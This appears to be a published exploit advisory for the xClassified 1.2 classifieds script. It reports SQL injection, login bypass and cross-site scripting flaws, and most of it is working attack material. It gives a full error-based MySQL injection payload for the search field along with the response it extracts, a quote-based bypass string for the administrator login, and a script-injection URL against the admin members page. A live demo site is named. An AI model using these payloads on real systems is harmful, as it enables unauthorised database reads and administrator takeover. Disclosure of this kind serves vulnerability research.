xClassified version 1.2 suffers from login bypass, cross site scripting, and remote SQL injection vulnerabilities.
7815507ab3380ded49f2a0d6ea254e7077cd4fe438b0190d59f47c8a1e26af29
# Exploit Title : xClassified 1.2 Multiple Vulnerabilities
# Vendor : http://xclassified.artifectx.com/
# Date Found : 2014-07-08
Vulnerabilities : SQL Injection / Login Bypass / XSS
=================
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
---------------------
SQL Injection :
Method : POST In Search Section .
Input Your SQLi Payload In Search TextBox .
example payload : 'and(select 1,2 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_schema=0x78636C6173736966696564 and table_name=0x75736572 limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)a)and'
Response : Duplicate entry 'UserId1' for key 'group_key'
---------------------
Login Bypass :
Admin Page : TARGET/administrator/
String For Bypass : '=' 'or'
---------------------
Cross Site Scripting (XSS) :
[After Login In Admin Page]
Method : GET
http://TARGET/demo/administrator/members.php?actionuser="><script>alert(/Hadi/)</script>
---------------------
Demo : http://xclassified.artifectx.com/demo/
---------------------
Credit : Hadi Arjmand , SeCTime.Ir
Thanks To Mr.HS3c - All Iranian Researchers And Exploiters
----- End -----